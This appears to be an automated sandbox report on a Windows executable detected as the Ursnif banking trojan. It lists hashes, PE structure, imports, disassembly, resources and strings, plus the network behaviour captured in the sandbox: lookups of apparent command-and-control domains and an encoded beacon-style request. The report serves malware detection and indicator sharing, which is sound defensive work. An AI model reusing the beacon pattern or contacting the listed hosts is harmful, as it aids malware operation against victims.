SHA256:	c26838865c476704101363c16c535dfae494dedadae972c0377c4f67669578b5
SHA512:	9574fecccc2b34b256025c391ee95fdac2e476e3533c753e44fc7fd218259327416b7eddbdc2ca6ba3956f0b7b65f633054f21ab08e562548353323ac3d8bc61
SSDEEP:	6144:mOcPU517+45GlCVKk8PVSXuZet0yyeuI3+9jbUm6nzKvPV:mOckd+RlqKkuVSXuZet0yyeroHUm6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0.r"t..qt..qt..q...q]..q...qe..q...q...q}..q...qt..qq..q...qu..q...qu..q...qu..qRicht..q........PE..L......^...................

File Icon


Icon Hash:	a2e8e8e8a2a2a4a8

Static PE Info

General
Entrypoint:	0x417e90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5EFCE5EA [Wed Jul 1 19:37:14 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	227bb68f00c01d84de5b7cf57cce44af

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F3F38AD7EEBh
call 00007F3F38AD7BF6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042FC90h
push 0041C0B0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00432064h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401364h]
cmp dword ptr [01FB5ABCh], 00000000h
jne 00007F3F38AD7BF0h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401360h]
call 00007F3F38AD7D73h
mov dword ptr [ebp-6Ch], eax
call 00007F3F38ADBD3Bh
test eax, eax
jne 00007F3F38AD7BECh
push 0000001Ch
call 00007F3F38AD7D30h
add esp, 04h
call 00007F3F38ADB698h
test eax, eax
jne 00007F3F38AD7BECh
push 00000010h
call 00007F3F38AD7D1Dh
add esp, 04h
push 00000001h
call 00007F3F38ADB5E3h
add esp, 04h
call 00007F3F38AD929Bh
mov dword ptr [ebp-04h], 00000000h
call 00007F3F38AD8E7Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x30274	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1bb7000	0x5f08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1bbd000	0x1808	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1450	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17cc8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x408	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30b2a	0x30c00	False	0.60816806891	data	7.04444899707	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x32000	0x1b84ac0	0x1400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1bb7000	0x5f08	0x6000	False	0.53857421875	data	5.60832120978	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1bbd000	0x11610	0x11800	False	0.0746651785714	data	0.972136620896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
YONAMIKORUFENI	0x1bba760	0xee8	ASCII text, with very long lines, with no line terminators	Spanish	Panama
RT_CURSOR	0x1bbb648	0x130	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x1bbb778	0xf0	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x1bbb868	0x10a8	dBase III DBT, version number 0, next free block index 40	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0x1bb7390	0x8a8	data	Spanish	Panama
RT_ICON	0x1bb7c38	0x6c8	data	Spanish	Panama
RT_ICON	0x1bb8300	0x568	GLS_BINARY_LSB_FIRST	Spanish	Panama
RT_ICON	0x1bb8868	0x10a8	data	Spanish	Panama
RT_ICON	0x1bb9910	0x988	data	Spanish	Panama
RT_ICON	0x1bba298	0x468	GLS_BINARY_LSB_FIRST	Spanish	Panama
RT_STRING	0x1bbc940	0xfc	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbca40	0x26c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbccb0	0x254	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x1bbc910	0x30	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x1bba700	0x5a	data	Spanish	Panama

Imports

DLL	Import
KERNEL32.dll	GetNumaNodeProcessorMask, SetCriticalSectionSpinCount, SearchPathW, SetInformationJobObject, lstrcmpA, FindFirstFileW, SetThreadContext, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, lstrlenA, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, BuildCommDCBAndTimeoutsA, FreeLibrary, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, GlobalAddAtomA, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, MoveFileExW, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, SetConsoleActiveScreenBuffer, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetFirmwareEnvironmentVariableA, GetSystemWindowsDirectoryW, CreateJobObjectW, AddConsoleAliasW, GetComputerNameW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, GetSystemWow64DirectoryA, SetCommTimeouts, CreateActCtxW, WaitForMultipleObjectsEx, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, SetVolumeMountPointA, ReadConsoleOutputW, SetConsoleCP, DeleteVolumeMountPointW, InterlockedPopEntrySList, LeaveCriticalSection, GetFileAttributesA, GlobalFlags, lstrcpynW, GetNamedPipeInfo, HeapValidate, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, HeapQueryInformation, TerminateProcess, GetAtomNameW, FileTimeToSystemTime, IsDBCSLeadByte, GetModuleFileNameW, UnregisterWait, GetBinaryTypeW, CompareStringW, ExitThread, GetVolumePathNameA, lstrlenW, SetConsoleTitleA, WritePrivateProfileStringW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, FindVolumeMountPointClose, GetLongPathNameA, VirtualAlloc, HeapSize, CreateNamedPipeA, CreateJobSet, LocalLock, LockFileEx, VerLanguageNameW, BuildCommDCBW, DefineDosDeviceA, FindClose, GetPrivateProfileStringA, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, MoveFileA, GetExitCodeThread, GetNumberFormatW, SetFileApisToANSI, QueryDosDeviceW, SetConsoleWindowInfo, SetThreadIdealProcessor, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, SetEnvironmentVariableA, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, GetDefaultCommConfigA, FindNextFileA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, _lread, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, GetProcessAffinityMask, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, WriteProfileStringW, EnumDateFormatsW, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, GetCPInfoExA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, ReadConsoleInputW, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, GetPrivateProfileSectionW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CopyFileExA, CreateFileW, SetStdHandle, GetPrivateProfileSectionNamesW, EnumResourceNamesW, GetThreadContext, lstrcatA, GetFullPathNameA, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, ExitProcess, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, FlushFileBuffers
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits
ADVAPI32.dll	InitiateSystemShutdownA, GetFileSecurityW
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Panama
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 18:23:50.534212112 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:50.534254074 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:50.534324884 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:50.553719997 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:50.553750992 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:50.786843061 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:50.786931992 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:51.073844910 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:51.073875904 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:51.074193954 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:51.074316978 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:51.079531908 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:51.120872021 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:51.193418980 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:51.193581104 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:51.193773985 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:51.238401890 CET	49762	443	192.168.2.5	74.6.143.26
Nov 24, 2021 18:23:51.238452911 CET	443	49762	74.6.143.26	192.168.2.5
Nov 24, 2021 18:23:51.268758059 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.268802881 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.268917084 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.269452095 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.269478083 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.358642101 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.358823061 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.368448019 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.368486881 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.368786097 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.370106936 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.371083975 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.412877083 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.573952913 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.574213982 CET	443	49763	87.248.100.216	192.168.2.5
Nov 24, 2021 18:23:51.574331045 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.576483011 CET	49763	443	192.168.2.5	87.248.100.216
Nov 24, 2021 18:23:51.576513052 CET	443	49763	87.248.100.216	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 18:23:50.497390985 CET	52441	53	192.168.2.5	8.8.8.8
Nov 24, 2021 18:23:50.517024994 CET	53	52441	8.8.8.8	192.168.2.5
Nov 24, 2021 18:23:51.244018078 CET	62176	53	192.168.2.5	8.8.8.8
Nov 24, 2021 18:23:51.263613939 CET	53	62176	8.8.8.8	192.168.2.5
Nov 24, 2021 18:24:11.737723112 CET	60151	53	192.168.2.5	8.8.8.8
Nov 24, 2021 18:24:11.760108948 CET	53	60151	8.8.8.8	192.168.2.5
Nov 24, 2021 18:25:31.805324078 CET	50463	53	192.168.2.5	8.8.8.8
Nov 24, 2021 18:25:31.825109005 CET	53	50463	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 24, 2021 18:23:50.497390985 CET	192.168.2.5	8.8.8.8	0x3e0d	Standard query (0)	yahoo.com	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:51.244018078 CET	192.168.2.5	8.8.8.8	0xdb09	Standard query (0)	www.yahoo.com	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:11.737723112 CET	192.168.2.5	8.8.8.8	0xc17f	Standard query (0)	soderunovos.website	A (IP address)	IN (0x0001)
Nov 24, 2021 18:25:31.805324078 CET	192.168.2.5	8.8.8.8	0x2edb	Standard query (0)	qoderunovos.website	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 24, 2021 18:23:50.517024994 CET	8.8.8.8	192.168.2.5	0x3e0d	No error (0)	yahoo.com		74.6.143.26	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:50.517024994 CET	8.8.8.8	192.168.2.5	0x3e0d	No error (0)	yahoo.com		98.137.11.163	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:50.517024994 CET	8.8.8.8	192.168.2.5	0x3e0d	No error (0)	yahoo.com		74.6.231.21	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:50.517024994 CET	8.8.8.8	192.168.2.5	0x3e0d	No error (0)	yahoo.com		74.6.143.25	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:50.517024994 CET	8.8.8.8	192.168.2.5	0x3e0d	No error (0)	yahoo.com		98.137.11.164	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:50.517024994 CET	8.8.8.8	192.168.2.5	0x3e0d	No error (0)	yahoo.com		74.6.231.20	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:51.263613939 CET	8.8.8.8	192.168.2.5	0xdb09	No error (0)	www.yahoo.com	new-fp-shed.wg1.b.yahoo.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 18:23:51.263613939 CET	8.8.8.8	192.168.2.5	0xdb09	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.216	A (IP address)	IN (0x0001)
Nov 24, 2021 18:23:51.263613939 CET	8.8.8.8	192.168.2.5	0xdb09	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.215	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:11.760108948 CET	8.8.8.8	192.168.2.5	0xc17f	Name error (3)	soderunovos.website	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 18:25:31.825109005 CET	8.8.8.8	192.168.2.5	0x2edb	Name error (3)	qoderunovos.website	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

yahoo.com

www.yahoo.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49762	74.6.143.26	443	C:\Users\user\Desktop\Rats4dIOmA.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-24 17:23:51 UTC	0	OUT	GET /jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: yahoo.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-24 17:23:51 UTC	0	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2021 17:23:51 GMT Connection: keep-alive Strict-Transport-Security: max-age=31536000 Server: ATS Cache-Control: no-store, no-cache Content-Type: text/html Content-Language: en X-Frame-Options: SAMEORIGIN Set-Cookie: B=b5jn619gpst97&b=3&s=c6; expires=Thu, 24-Nov-2022 17:23:51 GMT; path=/; domain=.yahoo.com Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: https://www.yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw Content-Length: 8
2021-11-24 17:23:51 UTC	1	IN	Data Raw: 72 65 64 69 72 65 63 74 Data Ascii: redirect

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49763	87.248.100.216	443	C:\Users\user\Desktop\Rats4dIOmA.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-24 17:23:51 UTC	1	OUT	GET /jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Connection: Keep-Alive Cache-Control: no-cache Host: www.yahoo.com Cookie: B=b5jn619gpst97&b=3&s=c6
2021-11-24 17:23:51 UTC	1	IN	HTTP/1.1 404 Not Found date: Wed, 24 Nov 2021 17:23:51 GMT p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" cache-control: private x-content-type-options: nosniff content-type: text/html; charset=UTF-8 x-envoy-upstream-service-time: 9 server: ATS Age: 0 Transfer-Encoding: chunked Connection: close Strict-Transport-Security: max-age=31536000 Content-Security-Policy: frame-ancestors 'self' https://.builtbygirls.com https://.rivals.com https://.engadget.com https://.intheknow.com https://.autoblog.com https://.techcrunch.com https://.yahoo.com https://.aol.com https://.huffingtonpost.com https://.oath.com https://.search.yahoo.com https://.search.aol.com https://.search.huffpost.com https://.verizonmedia.com https://.publishing.oath.com https://.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=cc01o4tgpst97&partner=; X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block
2021-11-24 17:23:51 UTC	2	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 42 3d 62 35 6a 6e 36 31 39 67 70 73 74 39 37 26 62 3d 33 26 73 3d 63 36 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 32 34 20 4e 6f 76 20 32 30 32 32 20 32 33 3a 32 33 3a 35 31 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 35 37 36 30 30 3b 20 44 6f 6d 61 69 6e 3d 2e 79 61 68 6f 6f 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 0d 0a 45 78 70 65 63 74 2d 43 54 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 2c 20 72 65 70 6f 72 74 2d 75 72 69 3d 22 68 74 74 70 3a 2f 2f 63 73 70 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2f 63 73 70 3f 73 72 63 3d 79 61 68 6f 6f 63 6f 6d 2d 65 78 70 65 63 74 2d 63 74 2d 72 65 70 6f 72 74 2d 6f 6e 6c 79 22 0d 0a 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 Data Ascii: Set-Cookie: B=b5jn619gpst97&b=3&s=c6; Expires=Thu, 24 Nov 2022 23:23:51 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"Referrer-Policy: no-ref
2021-11-24 17:23:51 UTC	3	IN	Data Raw: 34 33 34 0d 0a Data Ascii: 434
2021-11-24 17:23:51 UTC	3	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 75 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 3f 65 72 72 3d 34 30 34 26 65 72 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 25 32 66 6a 64 72 61 77 25 32 66 68 7a 31 62 71 33 50 6d 74 71 74 44 50 63 70 41 78 64 25 32 66 5f 32 46 47 59 73 39 56 5f 25 32 66 32 42 63 61 49 66 6a 38 6c 7a 62 65 36 64 77 70 31 53 35 30 25 32 66 71 6e 66 31 43 74 50 73 4f 32 45 47 73 54 4f 47 42 74 30 25 32 66 54 70 51 6f 34 4f 48 61 4c 68 31 44 5a 41 7a 4f 48 49 45 6c 67 32 25 32 66 4c 6d 4a 68 6e 67 6d 54 32 6b 4a 5f 32 25 32 66 46 48 75 4e 77 6e 65 48 25 32 66 4f 6c Data Ascii: <html><meta charset='utf-8'><script>var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fhz1bq3PmtqtDPcpAxd%2f_2FGYs9V_%2f2BcaIfj8lzbe6dwp1S50%2fqnf1CtPsO2EGsTOGBt0%2fTpQo4OHaLh1DZAzOHIElg2%2fLmJhngmT2kJ_2%2fFHuNwneH%2fOl
2021-11-24 17:23:51 UTC	4	IN	Data Raw: 0d 0a Data Ascii:
2021-11-24 17:23:51 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: Rats4dIOmA.exe PID: 6456 Parent PID: 5760

General

Start time:	18:23:19
Start date:	24/11/2021
Path:	C:\Users\user\Desktop\Rats4dIOmA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Rats4dIOmA.exe"
Imagebase:	0x400000
File size:	302080 bytes
MD5 hash:	76A29095E02A151ADC1F42EC844A65BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310816150.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310824742.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.518140305.00000000042B9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310739841.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310804717.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310680440.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310789542.0000000004758000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.310712356.0000000004758000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Rats4dIOmA.exe PID: 6456 Parent PID: 5760 Rats4dIOmA.exeCOMMON

Executed Functions

Function 0042F0A0, Relevance: 46.4, APIs: 4, Strings: 22, Instructions: 928COMMON

Download Yara Rule

Strings

xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F722
Dinilezu lacuke, xrefs: 0042F7F0
mikujukezicuharu, xrefs: 0042F7CF
Regefiri, xrefs: 0042F3F4
Xegixaze, xrefs: 0042F469
zetipabobutobawekicugi, xrefs: 0042F7C0
geceyuhocavanino goruyitozekitapopit, xrefs: 0042F47A
pemahu, xrefs: 0042F39B
Dumepof xumijaxovikik kemarep, xrefs: 0042F86C
zijiwe, xrefs: 0042F6E8
furafizasuyesipebokevocejirijan, xrefs: 0042F7CA
Petoco, xrefs: 0042F9CC
iyeg xogahes yoxohavit jobikuz, xrefs: 0042F45F
Lebihukemihuw puzihicafiruzat dexewiyuvizafa soj gelaxubedi, xrefs: 0042F861
Madesomaco diyoxilan xuw hihozexow, xrefs: 0042F867
2Y?, xrefs: 0042F745
Hucet, xrefs: 0042F458
\H, xrefs: 0042F6BE
Vefu mif kaxigija puhirege puwuf, xrefs: 0042F3EA
